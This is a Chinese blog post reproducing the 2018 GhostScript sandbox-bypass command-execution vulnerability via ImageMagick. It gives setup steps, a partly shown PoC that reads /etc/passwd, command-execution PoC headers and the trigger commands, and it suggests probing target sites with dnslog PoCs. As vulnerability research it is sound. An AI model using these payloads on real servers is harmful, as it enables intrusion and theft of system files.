一、漏洞信息
| 项目 | 描述 |
|---|---|
| 漏洞名称 | GhostScript 沙箱绕过(命令执行)漏洞 |
| 漏洞作者 | Tavis Ormandy |
| CVE编号 | 暂未分配 |
| 漏洞描述 | 攻击者利用此漏洞可以上传恶意构造的图像文件,当目标服务器在对图像进行裁剪、转换等处理时即会执行攻击者指定的命令。 |
| 影响范围 | |
| 披露时间 | 2018-08-21 |
二、复现环境
- OS:Ubuntu 14.10
- Ghostscript version:9.23(当下最新版本)
- Imagemagic version:7.0.8(当下最新版本)
三、环境搭建
3.1 安装Ghostscript
1 |
[email protected] ~$ cd /usr/local |
3.2 安装Imagemagic
1 |
[email protected] /usr/local$ wget https://github.com/ImageMagick/ImageMagick/archive/7.0.8-9.tar.gz |
四、漏洞验证
4.1 读文件
读取/etc/passwd文件内容的poc:
1 |
/FileToSteal (/etc/passwd) def |
将以上poc保存为poc.ps文件,并执行以下命令。
1 |
gs -q -sDEVICE=ppmraw -dSAFER poc.ps |
4.2命令执行
ubuntu poc:
1 |
%!PS |
centos poc:
1 |
%!PS |
这里我们是linux是Ubuntu发行版,故选择第一个poc进行测试。将以上poc保存为poc.jpg文件,并执行以下命令,测试对恶意图片文件进行格式转换。
1 |
/usr/local/bin/convert poc.jpg poc.jpg |
注意: 漏洞作者的《More Ghostscript Issues: Should we disable PS coders in policy.xml by default?》这篇文章里的convert命令不是ghostscript的,而是它的上游应用。可以是imagemagick,也可以是graphicsmagick。经过测试两个软件的convert命令都存在漏洞,我们这里复测的事imagemagick。
五、总结
ghostscript的上游应用有imagemagick,libmagick,graphicsmagick,gimp,python-matplotlib,texlive-core,texmacs,latex2html,latex2rtf等,其中ImageMagick受该漏洞影响最为严重。有相当多的网站,博客,媒体平台和流行的CMS(WordPress,Drupal等)在使用ImageMagick来进行图像处理。 故在日常渗透测试中,可以上传带有dnslog测试的poc,来测试目标网站是否存在该漏洞。
参考文章
- https://github.com/vulhub/vulhub/tree/master/ghostscript/9.23-rce
- More Ghostscript Issues: Should we disable PS coders in policy.xml by default?
- imagemaick的ghost script RCE漏洞
文章来源于gv7.me:GhostScript沙箱绕过命令执行漏洞复现
一般在对客户所有linux机器进行弱口令检查时,如果在线进行破解的话,先不说影响业务,破解速率很慢,而且必须保证可以破解期间保持访问。这时将在线破解变成让客户提供shadow,我们破解shadow就有优势多了。后来k哥提供了一个批量调用john the rip…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论